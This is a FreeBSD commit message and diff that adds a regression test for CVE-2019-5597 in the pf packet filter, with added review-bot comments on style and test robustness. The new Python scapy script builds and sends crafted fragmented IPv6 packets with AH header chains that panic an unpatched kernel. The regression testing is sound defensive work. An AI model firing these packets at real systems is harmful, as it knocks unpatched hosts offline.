svn commit: r344692 - head/tests/sys/netpfil/pf

Kristof Provost kp at FreeBSD.org
Fri Mar 1 07:39:57 UTC 2019


Author: kp
Date: Fri Mar  1 07:39:55 2019
New Revision: 344692
URL: https://svnweb.freebsd.org/changeset/base/344692

Log:
  pf tests: Test CVE-2019-5597
  
  Generate a fragmented packet with different header chains, to provoke
  the incorrect behaviour of pf.
  Without the fix this will trigger a panic.
  
  Obtained from:	Corentin Bayet, Nicolas Collignon, Luca Moro at Synacktiv

Added:
  head/tests/sys/netpfil/pf/CVE-2019-5597.py   (contents, props changed)
Modified:
  head/tests/sys/netpfil/pf/Makefile
  head/tests/sys/netpfil/pf/fragmentation.sh

Added: head/tests/sys/netpfil/pf/CVE-2019-5597.py
==============================================================================
--- /dev/null	00:00:00 1970	(empty, because file is newly added)
+++ head/tests/sys/netpfil/pf/CVE-2019-5597.py	Fri Mar  1 07:39:55 2019	(r344692)
@@ -0,0 +1,35 @@
+#!/usr/local/bin/python2.7
+
+import random
+import scapy.all as sp
+import sys
+
+UDP_PROTO  = 17
+AH_PROTO   = 51
+FRAG_PROTO = 44
+
+def main():
+    intf = sys.argv[1]
+    ipv6_src = sys.argv[2]
+    ipv6_dst = sys.argv[3]
+
+    ipv6_main = sp.IPv6(dst=ipv6_dst, src=ipv6_src)
+
+    padding = 8
+    fid = random.randint(0,100000)
+    frag_0 = sp.IPv6ExtHdrFragment(id=fid, nh=UDP_PROTO, m=1, offset=0)
+    frag_1 = sp.IPv6ExtHdrFragment(id=fid, nh=UDP_PROTO, m=0, offset=padding/8)
+    
+    pkt1_opts = sp.AH(nh=AH_PROTO, payloadlen=200) \
+            / sp.Raw('XXXX' * 199) \
+            / sp.AH(nh=FRAG_PROTO, payloadlen=1) \
+            / frag_1
+
+    pkt0 = sp.Ether() / ipv6_main / frag_0 / sp.Raw('A' * padding)
+    pkt1 = sp.Ether() / ipv6_main / pkt1_opts / sp.Raw('B' * padding)
+
+    sp.sendp(pkt0, iface=intf, verbose=False)
+    sp.sendp(pkt1, iface=intf, verbose=False)
+
+if __name__ == '__main__':
+	main()
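
Review bot: the frag_1 line computes offset=padding/8, which is an integer only because the shebang pins python2.7; under Python 3 the same expression yields a float where the fragment offset should be an integer count of 8-byte units. Writing padding // 8 gives the same value and removes that dependency. Separately, main() reads sys.argv[1] to sys.argv[3] with no length check, so a wrong invocation ends in an IndexError rather than a usage message, and the final main() call is indented with a tab while the rest of the file uses spaces. A short comment stating that pkt0 places the fragment header directly after the IPv6 header while pkt1 reaches it through two AH headers would document what the test exercises.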

Modified: head/tests/sys/netpfil/pf/Makefile
==============================================================================
--- head/tests/sys/netpfil/pf/Makefile	Fri Mar  1 07:37:45 2019	(r344691)
+++ head/tests/sys/netpfil/pf/Makefile	Fri Mar  1 07:39:55 2019	(r344692)
@@ -20,8 +20,10 @@ ATF_TESTS_SH+=	anchor \
 
 ${PACKAGE}FILES+=	utils.subr \
 			echo_inetd.conf \
-			pft_ping.py
+			pft_ping.py \
+			CVE-2019-5597.py
 
 ${PACKAGE}FILESMODE_pft_ping.py=	0555
+${PACKAGE}FILESMODE_CVE-2019-5597.py=	0555
 
 .include <bsd.test.mk>
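
Review bot: the new CVE-2019-5597.py entry in ${PACKAGE}FILES is named only after the advisory, whereas the neighbouring pft_ping.py is named for what it does. A one-line comment next to the FILESMODE_CVE-2019-5597.py line saying that this is the fragment sender called from fragmentation.sh would help whoever maintains this list later.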

Modified: head/tests/sys/netpfil/pf/fragmentation.sh
==============================================================================
--- head/tests/sys/netpfil/pf/fragmentation.sh	Fri Mar  1 07:37:45 2019	(r344691)
+++ head/tests/sys/netpfil/pf/fragmentation.sh	Fri Mar  1 07:39:55 2019	(r344692)
@@ -104,6 +104,11 @@ v6_body()
 
 	atf_check -s exit:0 -o ignore\
 		ping6 -c 1 -b 70000 -s 65000 2001:db8:43::3
+
+	$(atf_get_srcdir)/CVE-2019-5597.py \
+		${epair_send}a \
+		2001:db8:42::1 \
+		2001:db8:43::3
 }
 
 v6_cleanup()
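
Review bot: the added CVE-2019-5597.py call at the end of v6_body() is not wrapped in atf_check, unlike the ping6 command directly above it, so the script's exit status is not asserted. If the interpreter or scapy is missing, or the interface name is wrong, the fragments are never sent and nothing here reports it. Prefixing the call with atf_check -s exit:0 would catch that. Since the log message says the failure mode without the fix is a panic, a ping6 after the script would also give a positive check that the stack still answers.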

